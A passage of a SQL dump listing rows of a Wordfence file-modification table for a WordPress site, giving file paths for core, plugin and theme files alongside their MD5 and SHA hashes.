(0xc5ebe9e0c90d96541773ec26b5f1256e, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_full_24px.svg', 0, 0x90e6d3256d681a7b464999832406db9d, 0x90e6d3256d681a7b464999832406db9d, 0xaff7a3f9cede133dba6d598e75f1f622ada5b2e05e447ba2a42e2064ac92e28c, '', 0, '?'),
(0xc5f2432ddd0f200147bd134e52ebf8d1, 'wp-content/plugins/js_composer/include/params/textarea_html/textarea_html.php', 0, 0xa14095d599a660b91438b81c5c15573a, 0xa14095d599a660b91438b81c5c15573a, 0x2c63f680cab48b3358c0b864b6896d04abf0d2129a16677301449d961da94bcd, '', 0, '?'),
(0xc606747ed2cf1565e64c91315d45a651, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_assignment_ind_24px.svg', 0, 0xc493a38bbad9aa70969a062aa3e2a26f, 0xc493a38bbad9aa70969a062aa3e2a26f, 0x87da27b1f9c0c48ffb6830050b30ab095cd7790612d118d67aafbd426cf718b3, '', 0, '?'),
(0xc60999b72341a90a230262231efca03d, 'wp-includes/js/tinymce/themes/inlite/theme.min.js', 1, 0x00000000000000000000000000000000, 0x7b481194bebb48661b83a258e3ff090e, 0x460d173f29a3d5928e5f0a7f6eb02256b043512f8299991b49a9b928e9d38d94, '', 0, '?'),
(0xc60cfd70933109b03fc203d84a1840b3, 'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem', 1, 0x00000000000000000000000000000000, 0xfccbe6cec7a76e3351ad32e305184787, 0xff64ede2221f66dd8e95bc9d36656d886019f61b7a99b4cafae2503c4b4fd212, '', 0, '?'),
(0xc613e91e0d1356f07eebb80b7b0f7a06, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/grid_layout_select.php', 0, 0xcb7e177b9cb7377f13e9789937a585e9, 0xcb7e177b9cb7377f13e9789937a585e9, 0x0ade6fd9e962637494d587e583a68d7a25dedde39ad1043dd25f2d70b89392b8, '', 0, '?'),
(0xc62b92a0cd67d405bec27136a55e00e8, 'wp-admin/images/wheel.png', 1, 0x00000000000000000000000000000000, 0x4530bd2071306dbbc61a592556b958a0, 0x285db43a3d64d371db85bc4f7b39128cc28013d480a5769a85c8987e8ab2daf3, '', 0, '?'),
(0xc66474e01d809a53309b5b1d5c4f673a, 'wp-content/plugins/wordfence/modules/login-security/views/.htaccess', 1, 0x00000000000000000000000000000000, 0x85bcd541be61b862907672f1a402071d, 0x4387bef6bd277285150339bdec4004e24ba1de8674a1aa99f6e2a77723406bba, '', 0, '?'),
(0xc66f5832e62e6a1ac284477498eb8f52, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_live_help_24px.svg', 0, 0xfc05632f6a2065c2072a63a1198def59, 0xfc05632f6a2065c2072a63a1198def59, 0x149ed38a191e8b702b623cffb5bc9eba0b2e09facbb40f94b7b5962f2f8f48cc, '', 0, '?'),
(0xc6722549b75ad1aa0dd9a8f9f2cf4978, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_backend_editor.tpl.php', 0, 0xd432b7e0f3ef48078746558bafd1ccd5, 0xd432b7e0f3ef48078746558bafd1ccd5, 0x757f1c72f9b167a3708d17e6999679a9edebe850f7dc30c2dd3b5261bc9e579a, '', 0, '?'),
(0xc6858e908b06877c5fcb692f79a1d209, 'wp-includes/js/tinymce/plugins/media/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x111e5c52d4d0f2d41fc16f65884954bc, 0x00fab4bf36d2af625352df1a3fa045acbcce4fd24f141cabed23bf62b949a1f2, '', 0, '?'),
(0xc6934716f158393dedc7398f0da4d3fb, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/mouse.svg', 0, 0x7275fd0be4a9d95c31123081603ff5db, 0x7275fd0be4a9d95c31123081603ff5db, 0x7a69ca5f8f98b1f39271c887a3f96074653559700aed32077f2cdbb19cc663b1, '', 0, '?'),
(0xc6a8802cb8a14e7ad02c3a5bb80cce43, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-lt_LT.mo', 1, 0x00000000000000000000000000000000, 0x95894109f122207600527e5879f2bd23, 0x597c5f14531eef1d094d453513ec76fa72b9e694c65a47d43fa4c774db166a05, '', 0, '?'),
(0xc6ac2b1a96bcca1f49f3645e69203c00, 'wp-includes/js/jquery/suggest.js', 1, 0x00000000000000000000000000000000, 0x3a2474569145d51ecabf7fc4fb078982, 0x72e71c2c4bcb70c59772715e62a25c91b83d725ad0155d83c90307361f812b0b, '', 0, '?'),
(0xc6ac8ce553588983dd5a93f9e2339b7f, 'wp-includes/js/dist/plugins.js', 1, 0x00000000000000000000000000000000, 0xbe44053c6cf3cf00096ca0f61d1054d2, 0xf75b03c932ff2114b10a1cc1562bfe04335f3a4a58510c6a6bbf98a3c0b38427, '', 0, '?'),
(0xc6c05ea37a44074722bb87b9addc9a3a, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_healing_24px.svg', 0, 0x6415f2d85d113d9110e1e2d39fc0dbb7, 0x6415f2d85d113d9110e1e2d39fc0dbb7, 0xe9fff11e8c9c85907f5131311d00f1d5243ccb9f78b24391474ba455ce4948c2, '', 0, '?'),
(0xc6d54503c51dcda95ab3dcdf2921fbbb, 'wp-content/themes/Impreza/functions/migrations/us_migration_4_4_1.php', 0, 0x17583be2cceca5f28748b8214899d1f1, 0x17583be2cceca5f28748b8214899d1f1, 0xb2cf389b000e14a38ef1f992cbf718ce7ec356b5a9afe51be20224f6e1ab9ad6, '', 0, '?'),
(0xc6dc6da91e6d58f0e808f0322ceaa070, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_large_24px.svg', 0, 0xc1cc6d2e16c49de00316d809a5e33b88, 0xc1cc6d2e16c49de00316d809a5e33b88, 0x463b6c0e21d468eaea3848da11a018fe088fe10dd98743a562c3ca00a3bee9f9, '', 0, '?'),
(0xc6ebaab340d120049b3d0ca4c5187960, 'wp-content/plugins/wordfence/views/options/options-title.php', 1, 0x00000000000000000000000000000000, 0x1e45dd30f3142201ff8592af23131c93, 0xd1c3d6a9790ac9090ba013fbc4b3f6c6c2168d58159f48e82d3c6609adb463be, '', 0, '?'),
(0xc6fea9975fa00c5d6fbb2bbb2c8f4b89, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_iso_24px.svg', 0, 0xeae72dca98c89c4691be9abe6f0578ec, 0xeae72dca98c89c4691be9abe6f0578ec, 0x8248fa27d91738fddceb5738d31cf98b63dbfc69412462ee440c4728b73b6899, '', 0, '?'),
(0xc701cd8c25072bcb65168d40755128cf, 'wp-includes/js/dist/editor.min.js', 1, 0x00000000000000000000000000000000, 0xdcc370abb06f10a49b52d1a8ba3ff99e, 0xdbaed0af221887c707348557097843b6e49bd6b7f8f89dc428773b3626ce071f, '', 0, '?'),
(0xc7022ebe427e208457d488fcae6a5615, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_undo_24px.svg', 0, 0xd343f64e61669f927f565252b8599f43, 0xd343f64e61669f927f565252b8599f43, 0x57c447761b4302356ca901dcbb12ad27fbc054817741336958539f41b9bf623d, '', 0, '?'),
(0xc755fae09768adf07738759db1c5348d, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-it_IT.mo', 1, 0x00000000000000000000000000000000, 0x8da0126602cd2bdb61bcd75da0bea1b1, 0x65e0f827a8248f56db28f098e9270e939166ee2c962f197b8e8556d5ea4c3ea2, '', 0, '?'),
(0xc77eacee9c13c665e5cd3ca905dc6c18, 'wp-content/plugins/js_composer/config/content/shortcode-vc-empty-space.php', 0, 0x02d9c8042305dd8114ebdeb9ed3dff22, 0x02d9c8042305dd8114ebdeb9ed3dff22, 0xe83993e4b435619818002676ebbdbc9b969da6e6317dffdf8acd5b51c98d2cf5, '', 0, '?'),
(0xc7822d6929f62ef85ccee8e67a845e61, 'wp-includes/Text/Diff/Engine/shell.php', 1, 0x00000000000000000000000000000000, 0x5adeb5d2b61c5f9cd3d14fc86faa5543, 0x754e8a2fa949aabdb5a824f613cbd5edc6eb833e67ff18d667c44941fc98c124, '', 0, '?'),
(0xc78516fa39a0d919393aa0f7a41afe15, 'wp-includes/cache.php', 1, 0x00000000000000000000000000000000, 0x2472d9efa70dd691ec8cab2d74edae15, 0xd7c3a426e5df8880e8714c0593462ffda05c661d4df3feb8a074149a5f65028b, '', 0, '?'),
(0xc79dc25ebf78f0a44a421acd332dab36, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php', 1, 0x00000000000000000000000000000000, 0x90479618fe12355d7b2295bce3ab56d8, 0xa843cb4a727e571619e8844f59852a5bf33a5b6a29abb2c247fdd084d612658a, '', 0, '?'),
(0xc7a4113e7ab1d4849f139d214a5d3e0e, 'wp-includes/css/wp-auth-check-rtl.css', 1, 0x00000000000000000000000000000000, 0x47e23f3fd1381204bea0e6925770460b, 0xa28700897966450aa424d9d0f72dbb0136ae8eb4a1cc96d04308085a349f2589, '', 0, '?'),
(0xc7abc93dc5e86d04912fe01fc19c5e12, 'wp-admin/includes/schema.php', 1, 0x00000000000000000000000000000000, 0x11aeb604518f514a9f7913dc5b6bc792, 0x2dfe41d3f64635843882453ad0e9cf1675b0ccc74107b886bb6ba8d928a175c4, '', 0, '?'),
(0xc7b35caadd5f4c2d11065980c58c2524, 'wp-includes/ID3/module.audio.dts.php', 1, 0x00000000000000000000000000000000, 0xaa7ccfc174818bc15446f9063800ef0a, 0xc78e3ac794c125e728c8339eb87a851f801501003f89c9086cd4690e6b2d70ff, '', 0, '?'),
(0xc7c27a7a209816992872d38de679c104, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_border_right_24px.svg', 0, 0xf8d2fbf2d24d8fac58b1b354467dc45d, 0xf8d2fbf2d24d8fac58b1b354467dc45d, 0x7542d014494567adb4cdc280933012c0a507dd19a3e3723e111846814278196a, '', 0, '?'),
(0xc7d30c64a880524900a2ab9667230205, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/class-vc-grid-item-preview.php', 0, 0xc1473e392ff6f024ac7f2c724e158c60, 0xc1473e392ff6f024ac7f2c724e158c60, 0x19e8bb233e8c112712002c00b98ee417258116e80e7cf45b07bc069e9fbc27bf, '', 0, '?'),
(0xc7e577aadb79be2aae58cd4f0a479ba5, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php', 1, 0x00000000000000000000000000000000, 0x4ee9560f6c7e1cf286136d5b25577404, 0x18509671008083b493949a560e14157b7ce6306d003bd4dcd6329566064055ca, '', 0, '?'),
(0xc7e5dfc7c01e7af7124c2b6334f0b359, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_perm_identity_24px.svg', 0, 0x1640a6c4a475b1dd40eb755cb6dfd1d3, 0x1640a6c4a475b1dd40eb755cb6dfd1d3, 0xf875c71cd98385a623fa73701c8eb24f89c05f3d4e416289ee6d7436fccce5d8, '', 0, '?'),
(0xc7f17ddb0c43931b1e775895544380fb, 'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png', 1, 0x00000000000000000000000000000000, 0x9d6d135dbc6192ac0e955c24c9048f1f, 0xc7970892683fe0efef0653e9eecd29b83a9bc1d6694002682e90a058d7679486, '', 0, '?'),
(0xc81578defd667028f5a9761211bc2a28, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-excerpt.svg', 0, 0xc44765352729c31c283aebdbc2a9d4f3, 0xc44765352729c31c283aebdbc2a9d4f3, 0xcf0411e5ae9b8f13f0271fb52136a5b5360345f8f8e028706afd892c17282639, '', 0, '?'),
(0xc81a7b0867ddfc3f17d13367daa21abd, 'wp-admin/images/icons32-2x.png', 1, 0x00000000000000000000000000000000, 0xb525a42af908fafcf8cc07679ab4fabb, 0xd7232124edafd840ec306706e9bf2ed63b6916332521cdfd634850eb04959c3d, '', 0, '?'),
(0xc81de2fc6670b002f10021b974444b12, 'wp-admin/js/code-editor.js', 1, 0x00000000000000000000000000000000, 0x48424898ce3f9ea8bb373f8653282650, 0x71934593951f273cf2fef5d1a888e81490f133473793a1c714f461d812e2b78d, '', 0, '?'),
(0xc82275409eb354ac7f8514539bf135f2, 'wp-includes/images/smilies/icon_idea.gif', 1, 0x00000000000000000000000000000000, 0xe5ecd43c5dd7ff5718330e1974de81e5, 0xc57bf4325e1d14113453921da0b689546ca8e7b7e7ae49864ad1517ff8f62218, '', 0, '?'),
(0xc8379807008ef9031174748a13b27f2e, 'wp-content/plugins/wordfence/views/dashboard/status-renewing.php', 1, 0x00000000000000000000000000000000, 0x616eb924cd0136a8dde519bab9162205, 0x890274c9a2b590c4e3d2432d3ff8270328e175eaa2a641b8542d31626198db3a, '', 0, '?'),
(0xc838e2d7ecb6c3528d363e47228aa3f0, 'wp-includes/js/dist/element.js', 1, 0x00000000000000000000000000000000, 0x4281e59a1bbd522ae68bb353b3742372, 0x530006e29ce3e82004d8278ae1a92786edf629cc0e562748c779b131a1b10539, '', 0, '?'),
(0xc83bb1b081944ebc513ee389c4f4a802, 'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php', 1, 0x00000000000000000000000000000000, 0x187488c80e7677580a5f596721ff1fb2, 0x723ba61ac72047c2e9e5ace3f39a5b6924e029ae8d9d76975d6a379e696d1823, '', 0, '?'),
(0xc844cd13eaca0da5fb05a37a80993765, 'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1579191227.js', 1, 0x00000000000000000000000000000000, 0x6c1b599f5af669e0a886a0330001325b, 0x281e92e54123efc00117bc4697fef87e042ba69fa0466768a1f0530e9f2efb62, '', 0, '?'),
(0xc85918072427abbb0ebe9a106f91e3ec, 'wp-includes/css/wp-auth-check-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x095feb4ad3dc9c26670120c0f29dac10, 0xd1468549fb9099593e53f0c7ec64c626ac2b6595872bbb614873e51da26fe4da, '', 0, '?'),
(0xc8647237c981945bd775cc2423e04e8f, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Select.php', 0, 0xfceeae616951d4789042ad3289075c0b, 0xfceeae616951d4789042ad3289075c0b, 0x9ba7e29fc63897d5fb15cfb2e48c104519191e0a548d6038cc4e8486959f8221, '', 0, '?'),
(0xc868703f5dfa2856ffb9c39e17749e4b, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_ac_unit_24px.svg', 0, 0xc03fa86013a5760b7a0eeecc733e123e, 0xc03fa86013a5760b7a0eeecc733e123e, 0xc7c4d2ec86407eb980c49901f2c53ad2f9977fe076594f8a987b9579332c4074, '', 0, '?'),
(0xc86a8c37c86e4ae9fd16607a1681df3a, 'wp-content/themes/Impreza/framework/shortcodes/us_testimonials.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xc875e5d9437e1c370ae8e6f457b365d7, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php', 1, 0x00000000000000000000000000000000, 0xb99729c2db4fedbc41ec3f66a7535a70, 0xe7c8c82c106dc23f6ae29d848533fb8fd554cfe92113f5e2b19d8bf42f1ebf40, '', 0, '?'),
(0xc881b7f4c182232fee969da3009cb736, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php', 1, 0x00000000000000000000000000000000, 0x17b33415eaf1a8d3b975bf3b030650c0, 0xa86144f52ce7c7adb8ff2b76ad7f461665222bd71889158d0c0c218780c83174, '', 0, '?'),
(0xc88d509ec320e933c4efd114800a94cd, 'wp-includes/class-wp-customize-control.php', 1, 0x00000000000000000000000000000000, 0xe26e868764c6190255b33c6c9c6a65d1, 0x3d357537530d2049adfdde67a4bd49e1071056abd6967e7acafaed8c15874ec4, '', 0, '?'),
(0xc89c533521e0e52e5c356d80341d4af6, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/sticky-section.min.js', 0, 0x26f8ba9db373372f9da2b0a3f87573bd, 0x26f8ba9db373372f9da2b0a3f87573bd, 0x8cc4afe699f4339004afc88eab34c80420674442a750a0b95698185a3f63631b, '', 0, '?'),
(0xc8bdf8a433dbb4fdc7875cf574f88c01, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chess.svg', 0, 0x5c536be8c11d4470772673a4f009d671, 0x5c536be8c11d4470772673a4f009d671, 0xf1d86d6bb6727f2b5d8f685eb8b20bb50a33578d54920d98dac7e3276eef0e1d, '', 0, '?'),
(0xc8bf0f982de8d860b075faaac66ff0f2, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php', 1, 0x00000000000000000000000000000000, 0x61a0136d3b539c17b75623e5d36df349, 0x9e523946a8ccddf3f808ecc60c1b1987eb3437697d80caa794d943175ed77f25, '', 0, '?'),
(0xc8c2983773a1ae426c81b823b14a7d2d, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_horiz_24px.svg', 0, 0x4fff3848a5c9e757dfbb83fa392b4aec, 0x4fff3848a5c9e757dfbb83fa392b4aec, 0x756d98b7bc80169562716fdbeef1beec3abfa8b2d158014df84626868e19acfe, '', 0, '?'),
(0xc8d53db97f7fde06fc566d272fe9de6c, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_call_made_24px.svg', 0, 0x2a4b590ebef9a22066c0ae9f25b85540, 0x2a4b590ebef9a22066c0ae9f25b85540, 0x1a26d68ca1b22c430d6391093ce8de59df83aab4bd78abbb7f5a079b09b7d91d, '', 0, '?'),
(0xc9090b4382d2d027e675a08e673c70c2, 'wp-content/plugins/js_composer/include/classes/shortcodes/core/class-vc-shortcodes-manager.php', 0, 0xbe7162b186b03e8e5bc82f28a0c4d295, 0xbe7162b186b03e8e5bc82f28a0c4d295, 0x5c2b4a741252dcaaca5d4f835e81c8c50a88a51c6e23ea599d8838cd8ea31577, '', 0, '?'),
(0xc91318a583dbd07e0d1a4b342823e3c5, 'wp-admin/user/credits.php', 1, 0x00000000000000000000000000000000, 0xd920b4fb1be2c2c780081d5b4b7de55a, 0x651b8acfb3435146f219a5bd0301cb5b0596015e74c243f584d2b25b7e3d59f0, '', 0, '?'),
(0xc920d0f27fb9a33ba4e20866fe6c5228, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/trash-bin.svg', 0, 0xf3f0e31337234a9d947a650856f76654, 0xf3f0e31337234a9d947a650856f76654, 0x8ee1c1a4986be8816978986faec232900fc29f94ddd6d7a3fe2b046d9208cda2, '', 0, '?'),
(0xc9308f07e9bbfb0732a4743ab8bed9ac, 'wp-content/plugins/revslider/includes/framework/include-framework.php', 0, 0xb4662a5c850af1f70dab17287bc01520, 0xb4662a5c850af1f70dab17287bc01520, 0x7182cf107253ed4036981557e8808d88ea64091890ff407035c5d7cf79050507, '', 0, '?'),
(0xc9316b1329826d35670d0715dde90749, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_group_work_24px.svg', 0, 0x493d5e7dc31f1403ed71178c36d31777, 0x493d5e7dc31f1403ed71178c36d31777, 0xdea3bdf62a019e26fe946edac252a433b8b0890a1586c29c37469f682ec32110, '', 0, '?'),
(0xc94137a827e143239e778a53fb738e1e, 'wp-admin/css/about.css', 1, 0x00000000000000000000000000000000, 0xd218cc5bad00dc5fbd1dbb700b9a633a, 0x0d97aeb3b3c95490e5a401c60527af92521ad7b5eafd98dbc92139659565bc73, '', 0, '?'),
(0xc951fa47c9107d2d0dd41dce67af4750, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/assets/css/demo.html', 0, 0x79211452824a9708ab2dc72c0a8e103c, 0x79211452824a9708ab2dc72c0a8e103c, 0x9e793c79f3e1914e0c2257b69b91c28c33a464f746b1da7027d914077000f542, '', 0, '?'),
(0xc9672908bcc8db2871c534fb74a35ea0, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_volume_up_24px.svg', 0, 0x6ce1bd7a98d50dfdc66d71b50027d378, 0x6ce1bd7a98d50dfdc66d71b50027d378, 0xbbbaff12ccddba517fcffc1c07e16a6b91bcb3ee8111813714bd3aa76f747603, '', 0, '?'),
(0xc96c589477c1f3014207f52a58a757f1, 'wp-content/plugins/wordfence/images/sort_asc_disabled.gif', 1, 0x00000000000000000000000000000000, 0x4f7fc9a7c5fecd2ad25812ffb2db3965, 0x06af76891a04fe7c352e59581c20a982f789a4181011f25a079605e9b981c5b9, '', 0, '?'),
(0xc9710cbb7c3a59d7ee2add7c2fdfecb2, 'wp-content/plugins/js_composer/include/autoload/vendors/wpml.php', 0, 0xab4065daf294d7ef8acab7c84e676318, 0xab4065daf294d7ef8acab7c84e676318, 0x97c38808ec7e76146259b0988e4d7c180a2bc8cc070eac5d3edefe96188d0c51, '', 0, '?'),
(0xc976fb08e1f605f47c53e2bf3e207aa5, 'wp-content/themes/Impreza/functions/migrations/us_migration_3_4.php', 0, 0x50ced1874580c103b7f0be1534f48609, 0x50ced1874580c103b7f0be1534f48609, 0x782e8b9bfd75101eec327a9ae36ef3d3c57036bacf587f6a0ae133d074d1b607, '', 0, '?'),
(0xc98638a8c2d6c070c5bbd1b5020756fd, 'wp-content/plugins/wordfence/lib/wfActivityReport.php', 1, 0x00000000000000000000000000000000, 0x86063e095b07d5ffca1ae1b78eb27834, 0x072b7c1a23142a4e9c11ceb88df6b9b9af42c2fcb5c14e19445d7ff8d27c00c3, '', 0, '?'),
(0xc991fe4789a3c7cabd5b0ea9a7f82111, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator.svg', 0, 0x8e81d569ac28944d53def09d0f3bbf1c, 0x8e81d569ac28944d53def09d0f3bbf1c, 0x7296f782b520298958179b463ca425ab41a8b19f2f2050b68b9eb9f1e3680062, '', 0, '?'),
(0xc9a1ee888bcaa77eb2a2c1bf022e296b, 'wp-admin/includes/class-custom-background.php', 1, 0x00000000000000000000000000000000, 0xc048adfb52db0ac6a7e26b9cc6608bf1, 0xb9eb52e90ba9ff9426e79831e84ea45033fbfdd323b0c6c3cfe885150c3cf226, '', 0, '?'),
(0xc9a9a304c9253c8ec7d5c1e1385f25ea, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_shapes_24px.svg', 0, 0x3899bb034639a1d84416bead857de4c0, 0x3899bb034639a1d84416bead857de4c0, 0xe1b0c15bd5092f5d9215e4e716ec4fcfbc1f72fcc5ea056e5d45df7e7f80a973, '', 0, '?'),
(0xc9d1d01cacf38c788cbafd731670a907, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate-params.min.js', 0, 0xa24691c4bf1d174a305b5f7ed78b3148, 0xa24691c4bf1d174a305b5f7ed78b3148, 0x62dfc3326ee1f3b5cda5f954ef1eb535704be059b8050409503c2ecd2170e239, '', 0, '?'),
(0xc9d203b086933244b41d69dc651c10bd, 'wp-admin/css/l10n.css', 1, 0x00000000000000000000000000000000, 0xb5c4b8f85029fb7c84f0719f72b280ad, 0x77707053a6bddc22fc44c02ebcc56f944d4f8c6dc74fa9271562cb61c78b300e, '', 0, '?'),
(0xc9e1ceb8f026bc8387eb08262f1e30ad, 'wp-content/plugins/revslider/admin/assets/imports/news-hero/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xca0ea43f003a924138c7c166119279af, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/globe-money.svg', 0, 0x28e70ddbb4988cfac930b799e4c6ea89, 0x28e70ddbb4988cfac930b799e4c6ea89, 0xd02b3d020d4fd177b8d12f71dde9cfc9468cbec9e8af90e259e32157e8414d6c, '', 0, '?'),
(0xca1fb76e4941d0810839f8f3166b27f4, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-posts-slider.php', 0, 0xd142dbb812676b1abe85ecbd91a78d80, 0xd142dbb812676b1abe85ecbd91a78d80, 0xa8f0fbd72635351a36dd47543006cf2ea019b4e9d88a8eb0c5fb6dacf98d0faa, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0xca2126f869c6295efe57adb2f406529c, 'wp-includes/js/jquery/ui/widget.min.js', 1, 0x00000000000000000000000000000000, 0x00dedd56324da186973a3b2cc5e8023c, 0x35a4b73ce2a3dc3853499cf3520d41d973eb03efa4c6160873665b489c44a333, '', 0, '?'),
(0xca28138671823450e87dfd354f7afc6b, 'wp-admin/js/inline-edit-tax.js', 1, 0x00000000000000000000000000000000, 0x33d9729301a783c6561954a1451119a4, 0x25cede7da04b5308cf786296c70e4d41ce6ca60ba456ca56ace2322d6c4c351c, '', 0, '?'),
(0xca52b110add902d188e9b0debfbe0830, 'wp-admin/css/themes.css', 1, 0x00000000000000000000000000000000, 0x93b7262b1516cf0ec3d539b78c8142e1, 0x5f704efb8a3112b191534a9af2aa171d73ff8587a1a90df5e79da556db226095, '', 0, '?'),
(0xca6846034d3c40602503712de3e61503, 'wp-admin/includes/class-wp-filesystem-direct.php', 1, 0x00000000000000000000000000000000, 0x4c0c8b2d577afb8d3fae5b90c885b856, 0xce50c2d9aa488e45693af4a7bf6d8baba59c7642731017b2fc5fe850bb3c644a, '', 0, '?'),
(0xca707feaefb7f6cbcd94b6412bd2d5e6, 'wp-content/plugins/revslider/public/assets/assets/svg/places/ic_free_breakfast_24px.svg', 0, 0x02439da7630ab11564622c5f8fa1d6a8, 0x02439da7630ab11564622c5f8fa1d6a8, 0x48a33902eee4bbb9ba6ec1f543bf90b76f9c8f629704c16ff22fc368d76c13dc, '', 0, '?'),
(0xca72b99e7ba41a6ba114c022a8a46b1d, 'wp-admin/css/site-health-rtl.css', 1, 0x00000000000000000000000000000000, 0x27c646e3c3864f931729676695034395, 0x6588e41037aebfd14e1f547fb27b009e5792f0d3436cbed15da20e8d6b3ab067, '', 0, '?'),
(0xca77414483745247993a24545049e4f4, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_dining_24px.svg', 0, 0x6bc478786aaf40f6681133050c1c4713, 0x6bc478786aaf40f6681133050c1c4713, 0xc2bfced953c6783e8a4618a1346afa2c370ccfb506c16c58325dbff9e85f890e, '', 0, '?'),
(0xca786a5013d5f6bca8d92163c8177813, 'wp-admin/plugin-install.php', 1, 0x00000000000000000000000000000000, 0xed61499507e65af152e57cd510e5a6fb, 0x9dbc4e9919610b41583c013cd57fa9fabaa9aa31e9971da7114ac5b9e16ca158, '', 0, '?'),
(0xca987b096ba7b4a01e0e1f05324920e5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_hourglass_empty_24px.svg', 0, 0x7e63c5dbe6e0fd6525d6e169c9c4d366, 0x7e63c5dbe6e0fd6525d6e169c9c4d366, 0x205704b13a6cc863b21f0493c6dbdb0ccd8d0a8e5768ba583311f15c4abfb7e9, '', 0, '?'),
(0xcab721531c60fbb3ce07aa7333109646, 'wp-content/plugins/wordfence/js/jquery.qrcode.min.1579191227.js', 1, 0x00000000000000000000000000000000, 0x05f0b1d7d4b9b0b4975870606d650e3c, 0x7750001ed870d47a75594453de7a2857a0dfa50289ec50be33245391f6f21b91, '', 0, '?'),
(0xcab8d67673511515f31642efe443fa9b, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_local_movies_24px.svg', 0, 0xc1ef48c80d18e292325299b7daa48d19, 0xc1ef48c80d18e292325299b7daa48d19, 0x6af566870489306b0cc8dfb67a63a07ecdd18a4012729f8f5e6630e02eb8f001, '', 0, '?'),
(0xcac0345569b8429ddeec937c644000ab, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_google_trends.php', 0, 0x2e7448db916e50fd6b09fbc88610772e, 0x2e7448db916e50fd6b09fbc88610772e, 0xb98990d7d1b3651cdb76971f0b59b0d432769a0037d7b8ca1867c82d48f487a6, '', 0, '?'),
(0xcac4fc8357e53ec4d29fa2cfeffec85b, 'wp-includes/Requests/Exception/HTTP.php', 1, 0x00000000000000000000000000000000, 0xe8d5fc68b3c6fa15e4526c161172dae5, 0x6f13fd45c2b2745151621d6f0aaefe19baef72eea15171dae122812fb1828e85, '', 0, '?'),
(0xcadc8652289d271132576870f5a49747, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php', 1, 0x00000000000000000000000000000000, 0x401fd28f4889ff43a435cca85b00a5e5, 0xc058facd660e3ab54d8974decb8323fb03a5734403fa3428f84e1d478646e8ba, '', 0, '?'),
(0xcadd0962a20cb79638ce5bbf90b6a579, 'wp-includes/js/wp-emoji-release.min.js', 1, 0x00000000000000000000000000000000, 0xb2bdc6d8dfd107ed138f042d71ad4be2, 0xed807af05b9a33a49d7c9ea1292b59f7f7adfe2470fd62cd3d28573c95d0ea86, '', 0, '?'),
(0xcae3b19b998bad205639f87be2b6e962, 'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php', 1, 0x00000000000000000000000000000000, 0xdf64992beac7e7f66cdfc1401ffd68c6, 0x33d503695d6db7a8ff26a60997ae73d6aff5499b9b679a65bd6f6b9cd22f4dab, '', 0, '?'),
(0xcaee0b4fe5bfaf7552f2fbd263c15b6a, 'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php', 1, 0x00000000000000000000000000000000, 0x185b636ceb728b75a90609c3d0a1755e, 0x3670cb17d32760c02b2a5b411347e0348a8dfcfafc5e36c58aa3e81225d4c143, '', 0, '?'),
